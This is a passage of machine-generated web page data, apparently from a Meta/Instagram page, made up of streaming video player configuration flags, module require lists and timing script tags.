ion","value":"pdash"}]}],"oz_www_pre_start_buffer_ahead_target":[{"value":10,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_reset_catchup_timeout_after_play_sec_on_overwrite":[{"value":true,"contexts":[{"name":"content_category","value":"gaming"}]},{"value":true,"contexts":[{"name":"fbls_tier","value":"user"}]}],"oz_www_seek_on_latency_level_change_allowed":[{"value":"[[\"low\",\"normal\"],[\"normal\",\"normal\"]]","contexts":[{"name":"content_category","value":"gaming"},{"name":"is_live","value":true}]}],"oz_www_skip_videobuffer_gaps":[{"value":true,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_skip_videobuffer_gaps_on_buffer_updated":[{"value":true,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_stale_mpd_buffer_ahead_target":[{"value":2,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_start_buffer_underflow_target":[{"value":1.1,"contexts":[{"name":"connection_quality","value":"POOR"}]},{"value":1.1,"contexts":[{"name":"connection_quality","value":"MODERATE"}]}],"oz_www_steadystate_minbuffer_buckets":[{"value":4,"contexts":[{"name":"streaming_implementation","value":"pdash"},{"name":"latency_level","value":"ultra-low"}]},{"value":20,"contexts":[{"name":"streaming_implementation","value":"pdash"},{"name":"is_latency_sensitive_broadcast","value":true}]}],"oz_www_steadystate_minbuffer_sec":[{"value":1,"contexts":[{"name":"streaming_implementation","value":"pdash"},{"name":"latency_level","value":"ultra-low"}]},{"value":1.75,"contexts":[{"name":"streaming_implementation","value":"pdash"},{"name":"is_latency_sensitive_broadcast","value":true}]}],"oz_www_stream_types_eligible_for_partial_playback":[{"value":"audio","contexts":[{"name":"is_live","value":true}]}],"oz_www_systemic_risk_abr_initial_risk_factor":[{"value":4,"contexts":[{"name":"is_live","value":true}]}],"oz_www_systemic_risk_abr_low_mos_resolution":[{"value":260,"contexts":[{"name":"is_live","value":true}]}],"oz_www_time_to_first_byte_ignore_above_threshold_ms":[{"value":200,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}],"oz_www_use_live_latency_manager":[{"value":true,"contexts":[{"name":"streaming_implementation","value":"pdash"}]}]},"static_values":{"stream_buffer_size_float":15,"initial_stream_buffer_size_float":7.5,"min_switch_interval":5000,"min_eval_interval":1000,"bandwidth_upgrade_target":0.9,"live_bandwidth_upgrade_target":0.63308577239513,"resolution_constraint_factor":2,"resolve_video_time_update_on_fragmented_time_ranges":true,"live_send_push_headers":false,"live_initial_stream_buffer_size_float":3.5,"enable_video_debug":false,"reappend_init_segment_after_abort":false,"current_time_during_ready_state_zero_throws":false,"www_videos_nudge_timestamp_correction_s":0,"www_videos_extended_spl_logging_for_connected_tv":false,"live_abr_send_push_headers":false,"shaka_native_promise":true,"oz_www_skip_videobuffer_gaps":true,"oz_www_skip_timerange_gaps":true,"oz_www_skip_videobuffer_gaps_on_buffer_updated":true,"oz_www_skip_videobuffer_gaps_max_gap_size_sec":0,"use_resource_timing_entry_for_bandwidth":true,"force_lowest_representation_threshold":0,"force_lower_representation_step_ratio":0,"enable_request_pipelining_for_vod":false,"enable_streaming_for_vod":false,"use_continuous_streaming":false,"streaming_segment_size":4,"streaming_bandwidth_update_interval":180000,"multi_segment_decay":0,"enable_request_pipelining_for_live":true,"enable_streaming_code_path":true,"ignore_errors_after_unload":true,"use_pending_seek_position_for_reference":false,"start_stream_buffer_size":1,"videos_abr_debugger_storage":false,"fix_shaka_xhr_error_status":true,"set_current_time_in_resync":true,"live_stream_buffer_size_float":3,"use_dimensions_fallbacks":true,"aggressive_fast_moving_average_half_life":1.5779530704021,"aggressive_slow_moving_average_half_life":9.2335087917745,"ignore_left_button_when_pausing":true,"disable_360_abr":false,"clear_buffer_on_seek_back":false,"buffering_overflow_threshold":0,"use_buffer_target_only_after_buffering_goal_is_hit":false,"enable_content_protection":true,"drop_buffering_detection_from_html5_api":true,"exclude_tracks_without_smooth_playback":false,"mpd_parse_frame_and_audio_sampling_rate":false,"abort_loading_decisioning_logic":true,"buffer_velocity_time_in_past_to_consider":0,"evaluate_abr_on_fetch_end":false,"ignore_recent_bandwidth_eval_on_fetch_end":false,"bandwidth_penalty_per_additional_video":0.1,"overwrite_video_current_time_property":false,"low_start_stream_buffer_size":2.5,"low_bandwidth_start_stream_buffer_size_threshold":2000000,"connection_quality_context_throttle_frequency":1000,"allow_seek_logging_in_mixin":false,"fix_pause_current_time_in_mixin":true,"better_set_current_time_in_resync":false,"resync_set_current_time_fudge_factor":0,"enable_main_thread_availability_logging":true,"fix_overwritten_get_video_current_time":false,"should_use_oz_p2p":false,"oz_www_enable_lip_sync_abr_select_quality":false,"oz_www_enable_alternative_audio_tracks":true,"oz_www_video_cdn_url_refresh":false,"oz_www_no_rep_to_switch_fallback_progressive":false,"oz_www_enable_revoke_object_url_on_destroy":false,"oz_www_enable_abr_logging":false,"oz_www_fix_oz_p2p_enable_failed":true,"num_predictive_segments":0,"oz_www_stream_reader_max_buffer_len":0,"oz_www_generate_mos_segment_buffer_diff":false,"oz_www_pdash_use_pdash_segmentlocator":false,"oz_www_pdash_seq_based_approx":false,"oz_www_pdash_seq_based_approx_use_blockedrange":false,"oz_www_pdash_download_cursor_catchup_threshold_sec":0,"oz_www_pdash_download_cursor_catchup_tolerance_sec":0,"oz_www_pdash_download_cursor_catchup_skip_totalbufer":true,"oz_www_pdash_download_cursor_catchup_threshold_gop_multiplier":0,"oz_www_pdash_download_cursor_tolerance_gop_multiplier":0,"oz_www_pdash_download_cursor_bufferahead_gop_multiplier":0,"oz_www_pdash_download_cursor_between_catchups_seg":0,"oz_www_latencymanager_stalempd_edgelatency_sec":0,"oz_www_latencymanager_stalempd_edgelatency_sec_on":false,"oz_www_latencymanager_stalled_edgelatency_sec_on":false,"oz_www_latencymanager_stalled_edgelatency_sec":0,"oz_www_pdash_future_edgelatency_gops":0,"oz_www_catchup_timeout_after_play_sec":0,"oz_www_catchup_timeout_after_buffering_sec":0,"oz_www_reset_catchup_timeout_after_play_sec_on_overwrite":true,"oz_www_catchup_min_interval_sec":0,"oz_www_playback_speed_latency_adjustment_disabled":false,"oz_www_playback_speed_latency_adjustment_rate":0,"oz_www_playback_speed_enabled_delay_sec":4,"oz_www_playback_speed_min_buffer_sec":1,"oz_www_playback_speed_min_duration_sec":2,"oz_www_playback_speed_restore_min_duration_sec":1,"oz_www_playback_speed_latency_slowdown_adjustment_rate":0,"oz_www_playback_speed_latency_speedup_adjustment_rate":0,"oz_www_pdash_download_cursor_use_totalbuffer":true,"oz_www_pdash_download_cursor_nocatchup_use_currentbuffer":false,"oz_www_playback_speed_min_sharpness_factor":3,"oz_www_pdash_wait_on_mpd_refresh_when_error":true,"oz_www_pdash_download_cursor_pause_duration_of_gop":false,"oz_www_pdash_download_cursor_catchup_only_when_advancing":false,"oz_www_download_cursor_use_node_time":false,"oz_www_download_cursor_total_buffer_max_sec":0,"oz_www_download_cursor_buffer_ahead_time_max_sec":0,"oz_www_download_cursor_disable_buffer_ahead_rule_on":true,"oz_www_download_cursor_disable_buffer_ahead_rule_lr_on":false,"oz_www_download_cursor_1st_run_set_skipped_segment_on":true,"oz_www_download_cursor_1st_run_2_fallback":false,"oz_www_enable_predictive_dash":true,"oz_www_use_sc_timebased_segments":false,"oz_www_use_templated_pdash_segments":true,"oz_www_use_scf_timebased_segments":false,"oz_www_touch_cb_key":false,"oz_www_enable_dvl":true,"oz_www_use_dvl_with_timeout_ms":0,"oz_www_dvl_update_interval_ms":0,"oz_www_dvl_update_interval_reset_on_err":true,"oz_www_dvl_initial_segment_ignore_count":1,"oz_www_use_inline_manifest_for_live":true,"oz_www_use_live_latency_manager":false,"oz_www_player_emit_mpdready_early":false,"oz_www_clear_on_seek":true,"oz_www_player_emit_mpdparsed_early":false,"oz_www_parse_number_templated_uri":true,"is_low_latency":false,"fire_seek_events":false,"shaka_buffer_abr":false,"evaluate_abr_on_tracks_and_bandwidth_change":true,"enable_double_ingest":true,"www_videos_playback_remove_src_attr_on_unload":false,"www_videos_playback_call_load_on_unload":false,"has_live_rewind_egress":false,"has_live_rewind_ui_www":false,"use_oz_with_fbms_eligible":true,"create_restore_abort_loading_promise":true,"oz_www_fix_representation_ended_timing":true,"oz_www_safely_log_player_seeks":true,"oz_www_enable_adaptation":true,"oz_www_fix_quick_starter_overhead":true,"oz_www_abr_restrict_from_index":0,"oz_www_abr_restrict_to_index":0,"oz_www_initial_switch_interval":0,"oz_www_min_switch_interval":100,"oz_www_abr_min_bandwidth_samples":0,"oz_www_min_eval_interval":100,"oz_www_bandwidth_estimator_half_life":6,"oz_www_bandwidth_estimator_variance_penalty_half_life":0,"oz_www_bandwidth_estimator_variance_penalty_down_factor":0,"oz_www_bandwidth_estimator_variance_penalty_up_factor":0,"oz_www_bandwidth_estimator_outlier_exclusion_factor":50,"oz_www_bandwidth_estimator_std_dev_penalty_factor":0,"oz_www_abr_confidence_threshold":0.9,"oz_www_segments_to_stream":5,"oz_www_per_stream_duration_target":0,"oz_www_segments_to_stream_under_playhead_threshold":0,"oz_www_low_segment_stream_playhead_threshold":0,"oz_www_appends_per_segment":6,"oz_www_append_byte_target_without_range":100000,"oz_www_log_appended_secs":false,"oz_www_lazy_parse_sidx":false,"oz_www_abr_eval_buffer_threshold":0,"oz_www_throttle_playback_rate_on_stall":true,"oz_www_use_prefetch_cache":true,"oz_www_force_initial_representation":true,"oz_www_buffer_ahead_target":22,"oz_www_low_buffer_bandwidth_target_threshold":10,"oz_www_low_buffer_bandwidth_target_increase_factor":0,"oz_www_segments_to_stream_near_bandwidth_boundary":5,"oz_www_bandwidth_boundary_standard_deviation_factor":1,"oz_www_suppress_playing_event_while_buffering":false,"oz_www_resolution_constraint_factor":2,"oz_www_pre_start_buffer_ahead_target":16.924449682236,"oz_www_stale_mpd_buffer_ahead_target":0,"oz_www_setup_buffer_target_onload":true,"oz_www_in_play_buffer_underflow_target":0.1,"oz_www_in_play_buffer_overflow_target":1,"oz_www_buffer_when_waiting":false,"oz_www_start_buffer_underflow_target":0.1,"oz_www_byte_count_per_sample":200000,"oz_www_minimum_bytes_to_sample_on_close":25000,"oz_www_manifest_update_frequency_ms":0,"oz_www_manifest_initial_update_delay_ms":0,"oz_www_exclude_prefetch_bandwidth_samples":true,"oz_www_connection_quality_context_throttle_frequency":2000,"oz_www_paused_stream_segments_count":2,"oz_www_minimum_bandwidth_sample_duration":10,"oz_www_maximum_bandwidth_sample_bandwidth":100000000,"oz_www_max_bandwidth_sample_count":30,"oz_www_use_performance_entry_on_stream_close":false,"oz_www_ignore_time_to_response_start":false,"oz_www_network_seg_timeout_ms":0,"oz_www_bandwidth_response_time_handicap":0,"oz_www_bandwidth_ignore_on_stream_write_samples":false,"oz_www_bandwidth_use_response_time_adjustment":false,"oz_www_use_scheduler":true,"oz_www_cdn_experiment_id":"","oz_www_disable_audio_scheduler":false,"oz_www_no_new_loop_body_promise_when_stream_ongoing":true,"oz_www_fix_seek_performance":false,"oz_www_ignore_reset_after_seek_if_bufferahead":false,"oz_www_ignore_reset_after_seek_if_bufferahead_liverewind":true,"oz_www_enable_network_manager_error":false,"oz_www_parse_first_segment":false,"oz_www_enable_abr_for_first_request":false,"oz_www_update_media_source_duration":true,"oz_www_ms_promise_for_null":false,"oz_www_ms_promise_for_null_ms":0,"oz_www_sbm_waits_for_update_end":true,"oz_www_sbm_cancel_operation_synchronous":false,"oz_www_sbm_recursively_waits_for_update_end":false,"oz_www_auto_seek_playhead_slack":0.5,"oz_www_playhead_manager_buffered_auto_seek_playhead_slack":0.5,"oz_www_playhead_manager_buffered_is_near_gap_threshold":1.5,"oz_www_playhead_manager_buffered_numerical_error":0.01,"oz_www_playhead_manager_handle_timerange_update_on_timeupdate":true,"oz_www_playhead_manager_buffered_timerange_update_on_timeupdate":true,"oz_www_playhead_manager_timeupdate_throttle_ms":1000,"oz_www_playhead_manager_clamp_initial_playback_position":false,"oz_www_playhead_manager_buffer_gaps_skip_reverse":true,"oz_www_media_stream_buffer_gaps_ignore_before_seek":false,"oz_www_playhead_manager_initial_playback_position_lat_mgr":true,"oz_www_playheadman_dont_skip_ahead_past_last_fetched":false,"oz_www_seek_ahead_epsilon":0.05,"oz_www_seek_ahead_use_native_current_time":true,"oz_www_timeline_offset_threshold":10,"oz_www_live_rewind_seek_to_live_delta":8,"oz_www_update_seekable_range":true,"oz_www_update_duration_when_init_appended":true,"oz_www_abr_prevent_down_switch_buffer_threshold":11,"oz_www_check_buffer_range_once_for_playhead_update":false,"oz_www_fix_start_timestamp":true,"oz_www_fix_templated_manifest_r_field_check":true,"oz_www_seek_on_latency_level_change":false,"oz_www_seek_on_latency_level_change_allowed":"[]","oz_www_live_initial_playback_position":-20,"oz_www_live_query_time_in_range":true,"oz_www_timerange_manager_cleanup":false,"oz_www_livehead_fall_behind_block_threshold":30,"oz_www_overwrite_livehead_fall_behind_block_threshold":0,"oz_www_live_time_range_block_margin":5.9,"oz_www_overwrite_live_time_range_block_margin":0,"oz_www_live_gracefully_handle_mpd_errors":true,"oz_www_live_no_segment_when_playhead_is_before_first_segment":true,"oz_www_live_disable_mpd_updates_when_paused":true,"oz_www_cleanup_video_node_on_destroy":true,"oz_www_detach_media_source_manager":true,"oz_www_enable_abortload_and_reload":true,"oz_www_live_playhead_catch_up":false,"oz_www_live_catch_up_only_when_paused":false,"oz_www_live_catch_up_fall_behind_threshold":20,"oz_www_live_catch_up_live_head_delta":6,"oz_www_live_numerical_error_epsilon":0.0001,"oz_www_stop_manifest_update_when_static":true,"oz_www_buffer_end_only_when_buffering":false,"oz_www_stream_interrupt_check_mpd_stale_count_threshold":6,"oz_www_reach_end_only_when_video_ended":false,"oz_www_allow_queueing_end_of_stream_when_update":false,"oz_www_set_source_buffer_append_window_end":false,"oz_www_use_stream_end_time_in_segment_locator":false,"oz_www_pausable_stream_throws_error_when_aborted":true,"oz_www_network_retry_intervals_json":"{\"0\": 1000, \"404\": 2000, \"502\": 1000, \"503\": 1000, \"504\": 1000, \"429\": 2000, \"20\": 1000}","oz_www_network_retry_intervals_json_retry":false,"oz_www_network_reload_mpd_json_retry":false,"oz_www_network_end_broadcasts_json":"[\"410\"]","oz_www_network_skip_json":"[]","oz_www_network_reload_mpd_json":"[]","oz_www_fallback_on_append_error":false,"oz_www_enable_appends_on_wait_update_end_failure":false,"oz_www_bandwidth_penalty_per_additional_video":0,"oz_www_bandwidth_penalty_additional_video_start":0,"oz_www_prefetch_cache_bandwidth_upper_limit":0,"oz_www_throw_network_error_during_stream":false,"oz_www_retry_fetch_on_prefetch_error":true,"oz_www_use_abr_for_missing_default_representation":true,"oz_www_initial_manifest_request_retry_count":3,"oz_www_download_time_buffer_delta_penalty_factor":0,"oz_www_time_to_first_byte_estimate_half_life_ms":500,"oz_www_handle_missing_manifest_segment_timeline":true,"oz_www_mos_upper_threshold":0,"oz_www_mos_lower_threshold":0,"oz_www_abr_use_download_time":false,"oz_www_minimum_download_additional_buffer_ms":0,"oz_www_use_deferred_streaming_task":true,"oz_www_allow_abort_loading_from_autoplay_controller":false,"oz_www_enable_double_ingest":true,"oz_www_use_oz_credentials_provider":true,"oz_www_throw_on_non_zero_r_d_mismatch":true,"oz_www_fix_template_duration_artifact_in_manifest":true,"oz_www_bandwidth_cache_key":"bandwidthEstimate","oz_www_estimate_video_bandwidth_only":true,"oz_www_default_bandwidth_estimate":1000000,"oz_www_update_bandwidth_cache_on_sample":false,"oz_www_live_audio_ibr_bandwidth_percentage":0.05,"comet_www_no_pause_on_blur_or_focus_events":false,"oz_www_live_gracefully_handle_no_network":true,"oz_www_live_max_try_attempts_on_404":2,"oz_www_clear_buffer_when_switch_representation_initiator_is_user":true,"oz_www_use_segment_request_cache":false,"oz_www_seconds_to_stream":10,"oz_www_seconds_to_stream_near_bandwidth_boundary":10,"oz_www_queue_data_with_error_handling":false,"oz_www_clear_prepended_segments_count_on_append":true,"oz_www_back_off_pdash_504_retry":true,"oz_www_call_end_of_stream_in_quick_starter":true,"oz_www_instantiate_buffering_detector_before_quick_starter":true,"oz_www_maybe_end_stream_if_prepended_segments":true,"oz_www_seek_to_start_quick_starter":true,"oz_www_use_loose_manifest_updates":false,"oz_www_use_full_player_if_cached":true,"oz_www_enable_quickdashv2":false,"oz_www_copy_new_manifest":true,"oz_www_handle_switch_to_unparsed_representation_sidx":true,"oz_www_stable_buffered_timeranges_in_observedsourcebufferstate":true,"oz_www_emit_stream_error_event":true,"oz_www_max_start_eme_attempts":3,"oz_www_listen_for_canplay_in_buffering_detector":true,"oz_www_handle_mpd_retries_outside_oz_mpd_updater":true,"oz_www_respect_initial_representation_on_setup":false,"oz_www_update_live_video_config_on_representation_switch":true,"oz_www_mpd_update_cancel_current_request_tracker":true,"oz_www_tagged_time_range_per_append_throttle":0,"oz_www_fix_reload_manifest_retry":true,"oz_www_fix_source_buffer_error_logging":true,"oz_www_min_block_time_range_interval_ms":0,"oz_www_fix_buffer_ahead_priority_strategy":true,"oz_www_append_last_segment_if_beyond_end":true,"oz_www_set_stream_anchor_only_on_done_status":true,"oz_www_fix_stream_deferred_cancel":true,"oz_www_sbm_abort_on_readable_stream_error":true,"oz_www_cancel_tracker_on_append_error":true,"oz_www_pixels_below_viewport_to_observe":0,"oz_www_prioritize_by_viewport_static_penalty":0,"oz_www_fix_setup_video_duration_on_representation_switch":true,"oz_www_handle_mpd_null_error_codes":true,"oz_www_fix_prepended_segments_tagging":true,"oz_www_xmlparser_use_domparser":true,"oz_www_cache_mos_threshold":false,"oz_www_load_video_node_on_unload":true,"oz_www_convert_dom_exception_to_oz_error":true,"oz_www_sbm_check_source_buffer_ready_state_on_cancel":true,"oz_www_prevent_unnecessary_seek_stream_anchor_reset":true,"oz_www_stream_types_eligible_for_partial_playback":"","oz_www_partial_playback_buffer_overflow":0.75,"oz_www_live_use_inline_manifest_after_request_manifest":false,"oz_www_live_gracefully_handle_410":true,"oz_www_segment_end_410_response":true,"oz_www_segment_end_410_response_loop_end":true,"oz_www_steadystate_minbuffer_sec":0,"oz_www_steadystate_minbuffer_buckets":0,"oz_www_steadystate_minbuffer_buckets_sec":1,"oz_www_pixels_above_viewport_to_observe":0,"oz_www_delay_stream_end_for_sourceended":true,"www_videos_shaka_use_xbox_buffered_fudge_factor":0.05,"oz_www_media_source_is_available_in_ended_state":true,"oz_www_unset_override_oz_request_implementation_on_hive_error":false,"oz_www_live_gracefully_handle_502":true,"oz_www_systemic_risk_abr_apply_representation_restrictions":true,"oz_www_dynamic_mpd_initial_playback_position_offset_modifier":4,"oz_www_player_formats_for_low_latency":"[]","oz_www_loop_body_handle_error_interval_ms":1,"oz_www_load_sequence_max_delay_ms":0,"oz_www_get_fetch_body_text_when_response_not_ok":true,"oz_www_load_sequence_only_prioritize_first_count":0,"oz_www_stream_interrupted_fuzzy_equals":false,"oz_www_sbm_skip_abort_on_media_error":true,"oz_www_sbm_abort_on_append_new_readable_stream":false,"oz_www_prevent_unnecessary_quickstarter_instance":true,"oz_www_stricter_mpd_parser_invariants":true,"oz_www_accept_external_buffering_detector":true,"oz_www_treat_inline_mpd_xml_empty_string_as_null":false,"oz_www_live_gracefully_handle_429":true,"oz_www_use_systemic_risk_abr":true,"oz_www_use_sidnee_abr":false,"oz_www_systemic_risk_abr_risk_factor":1.75,"oz_www_time_to_first_byte_ignore_above_threshold_ms":0,"oz_www_bandwidth_ttfb_samples_to_save":5,"oz_www_blue_video_player_pass_inline_mpd_xml_empty_string_as_undefined":false,"oz_www_blue_video_player_force_xhr":false,"oz_www_set_global_config":false,"oz_www_systemic_risk_abr_low_mos_risk_factor":1.3,"oz_www_systemic_risk_abr_min_watchable_mos":30,"oz_www_systemic_risk_abr_low_mos_resolution":0,"oz_www_prevent_multiple_successive_representation_switch":true,"oz_www_sidx_parser_memory_optimization":true,"oz_www_buffer_when_waiting_in_partial_buffer":true,"oz_www_stream_interrupt_in_play_buffer_overflow_target":1,"oz_www_stream_interrupt_buffer_target_timeout_ms":10000,"oz_www_recent_buffer_in_play_buffer_overflow_target":3,"oz_www_recent_buffer_timeout_ms":10000,"oz_www_use_ending_duration_for_gop_multiplier":true,"oz_www_live_trace_parse_emsg":true,"oz_www_catchup_use_timeline_range_end_time_as_end":false,"oz_www_perf_log_representation_id_more":true,"oz_www_systemic_risk_use_fetch_range_duration":false,"oz_www_use_simple_moving_average_estimator":false,"oz_www_http_no_cache":false,"oz_www_use_buffering_detector_for_playhead_interruption":true,"oz_www_enable_immediate_down_switch":false,"oz_www_handle_media_source_manager_errors":true,"oz_www_handle_invalid_webm_duration":false,"oz_www_parse_initialization_binary":true,"oz_www_systemic_risk_abr_high_estimate_confidence":52,"oz_www_data_reader_concat_once":true,"oz_www_pump_concat_once":true,"oz_www_sbm_append_readable_stream_concat_once":true,"oz_www_log_appended_segment_info":false,"oz_www_log_media_element_error_source_buffer_updateend_error":true,"oz_www_log_extra_events":true,"oz_www_overwrite_video_current_time_property":true,"oz_www_clear_buffer_on_seek_into_unbuffered_range":true,"oz_www_numerical_range_utils_is_after_range_exclusive":true,"oz_www_server_side_abr_send_client_estimates":false,"oz_www_server_side_abr_use_server_estimates":false,"oz_www_live_gracefully_handle_504":true,"oz_www_debug_live_replay":false,"oz_www_append_retry_quota_exceeded_error":true,"oz_www_buffer_target_constraint_minimum_sec":2,"oz_www_buffer_target_constraint_append_succeeded_reward":0.2,"oz_www_always_use_current_time_in_playback_state":true,"oz_www_buffer_target_constraint_quota_exceeded_penalty":0.3,"oz_www_retry_null_error_code_in_stream":false,"oz_www_emit_destroyed_after_media_keys_clear":false,"oz_www_do_not_end_stream":false,"oz_www_do_not_flush_data_queue_after_destroy":false,"oz_www_do_not_update_duration_vod":false,"oz_www_no_representation_error_detailed_message":true,"oz_www_mpd_updater_network_request_timeout_ms":20000,"oz_www_restart_media_streams_on_stream_resumed":false,"oz_www_media_stream_tracker_cancel_on_seek":false,"oz_www_media_stream_fix_double_segments_compute":false,"oz_www_fix_initial_segment_non_zero_start_time":true,"oz_www_get_mpd_least_last_time_range":true,"oz_www_respect_playback_restrictions_in_abr_fallback":true,"oz_www_null_segment_for_no_buffer_target":true,"oz_www_systemic_risk_abr_initial_risk_factor":1,"oz_www_systemic_risk_abr_document_hidden_risk_factor":0,"oz_www_use_bandwidth_estimate_from_headers_in_abr":false,"oz_www_use_ttfb_from_headers":false,"oz_www_skip_playhead_adjustment_before_initial_playback_position":false,"oz_www_clear_buffer_on_seek_epsilon_s":0,"oz_www_handle_buffered_timerange_update_on_ratechange":false,"oz_www_stub_safari_source_buffer_abort":false,"oz_www_clear_buffer_on_seek_nudge_s":0,"oz_www_streaming_task_reject_current_stream_deferred":true,"oz_www_min_buffer_behind_playhead":10,"oz_www_check_mediasource_readystate_before_end_of_stream":true,"oz_www_retry_video_element_error":true,"oz_www_clamp_seek_to_first_buffer_range_epsilon":0.75,"oz_www_ignore_restrictions_when_all_representations_restricted":false,"oz_www_hive_maximum_trimming_seconds":0,"oz_www_block_representation_status_codes_json":"[500, 503]","oz_www_block_representation_status_codes_temporarily_json":"{}","oz_www_revoke_object_url_on_detach":false,"oz_www_abort_clear_video_node_on_detach":false,"oz_www_proceed_on_representation_change_in_init_append_fail":true,"oz_www_should_check_that_source_buffer_attached":false,"oz_www_exclude_large_representations_after_restrictions":true,"oz_www_stop_loop_driver_immediately_on_cleanup":true,"oz_www_playhead_manager_handle_time_range_update_on_waiting":false,"oz_www_enable_error_recovery_attempt_logging":true,"oz_www_systemic_risk_abr_prefetch_initial_risk_factor":5,"oz_www_prefetch_resolution_threshold":810,"oz_www_throw_no_license_error":true,"oz_www_vtt_caption_representation":true,"oz_www_live_video_send_transaction_id_in_requests":false,"oz_www_log_exposure_on_oz_initialization":false,"oz_www_systemic_risk_abr_prefetch_low_mos_resolution":0,"oz_www_allow_subsequent_prefetch":true,"oz_www_comet_video_player_live_vtt_captions":false,"oz_www_prefetch_retention_duration_ms":0,"oz_www_clear_prefetch_on_unload":false,"oz_www_emit_captions_changed_event":true,"oz_www_use_vtt_captions_visible_buffer_strategy":false,"oz_www_disable_end_of_stream_in_caption_stream":true,"oz_www_append_once_per_stream_in_caption_stream":true,"oz_www_append_once_per_stream_in_application_stream":false,"oz_www_enable_era_logging_for_application_stream":false,"oz_www_emit_stream_gone_on_end_stream_before_start":true,"oz_www_sidx_segment_retry_attempts":9999,"oz_www_sidx_segment_retry_interval_ms":100,"oz_www_clear_buffer_around_playhead_boundary_ms":5000,"oz_www_fix_manifest_fetch_mixed_promise_catch":true,"oz_www_fix_update_duration_check":false,"oz_www_never_decrease_mediasource_duration":false,"oz_www_normalize_mpd_fetch_errors":true,"oz_www_no_retry_on_empty_string_error_code":false,"oz_www_use_src_object_for_media_source":false,"oz_www_mpd_parse_all_adaptation_sets":true,"oz_www_mpd_ensure_playable_representations":false,"oz_www_ull_use_broadcast_sensitivity_type":true,"oz_www_ull_fallback_stall_count":2,"oz_www_live_video_chunk_duration":0,"oz_www_av1_check_hardware_support":false,"oz_www_ultra_low_latency_bandwidth_threshold":10000000,"oz_www_bandwidth_estimate_header_key":"","oz_www_bandwidth_estimate_key":"","oz_www_fix_ull_fallback_stall_count":false,"oz_www_set_latency_context_immediately":false,"oz_www_fall_back_to_low_latency_in_ull":false,"oz_www_bandwidth_header_expire_threshold":0,"oz_www_fix_live_rewind_user_selected_playback_speed":true,"oz_www_is_csvqm_enabled":true,"oz_www_msm_refactor_wait_for_sourceopen":false}},5261],["cr:8374",["CometIXTFacebookXfacUniversalTriggerEntryPoint.entrypoint"],{"__rc":["CometIXTFacebookXfacUniversalTriggerEntryPoint.entrypoint",null]},-1],["cr:7443",["useCometEntryPointDialog"],{"__rc":["useCometEntryPointDialog",null]},-1],["cr:927622",["ReadableStreamPolyfill"],{"__rc":["ReadableStreamPolyfill",null]},-1],["cr:927623",["WritableStreamPolyfill"],{"__rc":["WritableStreamPolyfill",null]},-1],["cr:1473549",[],{"__rc":[null,null]},-1],["cr:1836099",[],{"__rc":[null,null]},-1],["cr:1871597",[],{"__rc":[null,null]},-1],["cr:1947728",[],{"__rc":[null,null]},-1],["cr:1993377",[],{"__rc":[null,null]},-1],["cr:3014",["MaybeNativePromise"],{"__rc":["MaybeNativePromise",null]},-1]],"require":[["CometExceptionDialog.react"],["SecuredActionTriggerWithAccountID.react"],["SecuredActionTriggerWithEncryptedContext.react"],["FDSTooltipDeferredImpl.react"],["PolarisQPManager.react"],["PolarisHttp500UnexpectedErrorPage.react"],["TransportSelectingClientSingletonConditional"],["GlobalVideoPortsImpl.react"],["emptyFunction","thatReturns",["RequireDeferredReference"],[[{"__dr":"CometExceptionDialog.react"},{"__dr":"SecuredActionTriggerWithAccountID.react"},{"__dr":"SecuredActionTriggerWithEncryptedContext.react"},{"__dr":"FDSTooltipDeferredImpl.react"},{"__dr":"PolarisQPManager.react"},{"__dr":"PolarisHttp500UnexpectedErrorPage.react"},{"__dr":"TransportSelectingClientSingletonConditional"},{"__dr":"GlobalVideoPortsImpl.react"}]]],["CometTooltipDeferredImpl.react"],["VideoPlayerSpinner.react"],["VideoPlayerCaptionsArea.react"],["oz-player"],["Bootloader","markComponentsAsImmediate",[],[["VideoPlayerHTML5ApiCea608State","VideoPlayerHTML5ApiWebVttState","VideoPlayerEmsg","OzVTTSourceBufferImpl"]]],["RequireDeferredReference","unblock",[],[["CometExceptionDialog.react","SecuredActionTriggerWithAccountID.react","SecuredActionTriggerWithEncryptedContext.react","FDSTooltipDeferredImpl.react","PolarisQPManager.react","PolarisHttp500UnexpectedErrorPage.react","TransportSelectingClientSingletonConditional","GlobalVideoPortsImpl.react","CometTooltipDeferredImpl.react","VideoPlayerSpinner.react","VideoPlayerCaptionsArea.react","oz-player"],"sd"]],["RequireDeferredReference","unblock",[],[["CometExceptionDialog.react","SecuredActionTriggerWithAccountID.react","SecuredActionTriggerWithEncryptedContext.react","FDSTooltipDeferredImpl.react","PolarisQPManager.react","PolarisHttp500UnexpectedErrorPage.react","TransportSelectingClientSingletonConditional","GlobalVideoPortsImpl.react","CometTooltipDeferredImpl.react","VideoPlayerSpinner.react","VideoPlayerCaptionsArea.react","oz-player"],"css"]]]}},{"__bbox":{"require":[["qplTimingsServerJS",null,null,["7482530692769266283","tierTwoBeforeScheduler"]]]}},{"__bbox":{"require":[["qplTimingsServerJS",null,null,["7482530692769266283","tierTwoInsideScheduler"]]]}}]]]}</script>
|
53
|
+
<script type="application/json" data-content-len="83" data-sjs="">{"require":[["qplTimingsServerJS",null,null,["7482530692769266283","tierTwoEnd"]]]}</script>
|
54
|
+
|
55
|
+
<script type="application/json" data-content-len="82" data-sjs="">{"require":[["qplTimingsServerJS",null,null,["7482530692769266283","tierThree"]]]}</script>
|
56
|
+
